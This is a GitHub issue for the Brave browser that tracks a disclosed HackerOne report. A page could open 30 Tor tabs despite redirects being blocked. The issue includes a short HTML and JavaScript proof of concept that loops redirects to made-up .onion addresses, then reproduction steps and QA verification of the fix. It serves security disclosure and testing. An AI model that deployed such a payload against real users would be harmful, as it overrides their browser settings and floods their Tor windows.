Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[hackerone]: Redirect with Tor tabs #32706

Closed
kdenhartog opened this issue Sep 4, 2023 · 5 comments · Fixed by brave/brave-core#20125
Closed

[hackerone]: Redirect with Tor tabs #32706

kdenhartog opened this issue Sep 4, 2023 · 5 comments · Fixed by brave/brave-core#20125
Assignees
@boocmp
Labels
feature/tor OS/Desktop priority/P2 A bad problem. We might uplift this to the next planned release. QA Pass-Linux QA Pass-macOS QA Pass-Win64 QA/Test-All-Platforms QA/Test-Plan-Specified QA/Yes release-notes/include sec-low security
Milestone
1.60.x - Release

Comments

@kdenhartog
Copy link
Member

kdenhartog commented Sep 4, 2023
edited by boocmp
Loading

https://hackerone.com/bugs?subject=brave&report_id=2133384

credit: xiaoyinl

Steps To Reproduce:

  1. Host the following HTML somewhere:
<html>
    <head>
        <meta charset="utf-8">
        <title>A Malicious Website</title>
        <script>
            function spamUsers() {
                for (let i = 0; i < 30; i++) { document.location.href = 'http://ljsdjfl' + i + '.onion'; }
            }            
        </script>
    </head>
    <body>
        <button onclick="spamUsers()">Start</button>
    </body>
</html>
  1. Enable "automatically redirect .onion sites" in Brave, and make sure the default behavior for "pop-ups and redirects" is set to "Don't allow sites to send pop-ups or use redirects"
  2. Navigate to the PoC page. Then click "Start". You can see a new Tor window opens 30 new tabs.
@boocmp boocmp self-assigned this Sep 6, 2023
@rebron rebron added the priority/P2 A bad problem. We might uplift this to the next planned release. label Sep 8, 2023
@boocmp boocmp mentioned this issue Sep 12, 2023
Merged
25 tasks
@brave-builds brave-builds added this to the 1.60.x - Nightly milestone Sep 15, 2023
@stephendonner
Copy link

Hi @boocmp can we get a testplan submitted for this, please? Thanks! 🙏

@boocmp
Copy link

boocmp commented Oct 5, 2023

Hi @boocmp can we get a testplan submitted for this, please? Thanks! 🙏

I've added steps to reproduce. Now only one tab should appear in the Tor window.

@LaurenWags
Copy link
Member

LaurenWags commented Oct 6, 2023
edited
Loading

Verified with

Brave | 1.60.81 Chromium: 118.0.5993.54 (Official Build) beta (x86_64)
-- | --
Revision | 1efb3f333eb41cc34af46ca31fb33c30e0afbfae
OS | macOS Version 13.6 (Build 22G120)

Reproduced the issue using 1.58.137 Chromium: 117.0.5938.153 and STR from description:

1 58

Verified only one tab is opened in Tor window when using 1.60.81 Chromium: 118.0.5993.54 and following STR from description.

Example Example Example
1 2 3

@LaurenWags LaurenWags added QA/In-Progress Indicates that QA is currently in progress for that particular issue QA Pass-macOS QA/Test-All-Platforms and removed QA/In-Progress Indicates that QA is currently in progress for that particular issue labels Oct 6, 2023
@GeetaSarvadnya
Copy link

Verification PASSED on

Brave | 1.60.88 Chromium: 118.0.5993.70 (Official Build) beta (64-bit)
-- | --
Revision | ff9150ac5dd9934a7f431ddf478ad3e45ae68546
OS | Windows 10 Version 22H2 (Build 19045.3570)

Reproduced the issue on 1.58.137 using STR from description:
image

Verified only one tab is opened in Tor window when using 1.60.88 Chromium: 118.0.5993.70 and following STR from description.
image

@btlechowski
Copy link

Verified with

Brave 1.60.102 Chromium: 118.0.5993.96 (Official Build) beta (64-bit)
Revision 3598a9fc6b7752181feb25caa131bc386d6d054c
OS Linux

Reproduced the issue on 1.59.x
image

Verified in 1.60.x
image

@LaurenWags LaurenWags mentioned this issue Nov 1, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@boocmp boocmp

Labels
feature/tor OS/Desktop priority/P2 A bad problem. We might uplift this to the next planned release. QA Pass-Linux QA Pass-macOS QA Pass-Win64 QA/Test-All-Platforms QA/Test-Plan-Specified QA/Yes release-notes/include sec-low security
Projects
Security & Privacy
Status: Completed
Milestone
1.60.x - Release
Development

Successfully merging a pull request may close this issue.

Prevent the opening of a new Tor tab on every renderer initiated navigation. brave/brave-core
8 participants
@stephendonner @rebron @kdenhartog @LaurenWags @btlechowski @GeetaSarvadnya @brave-builds @boocmp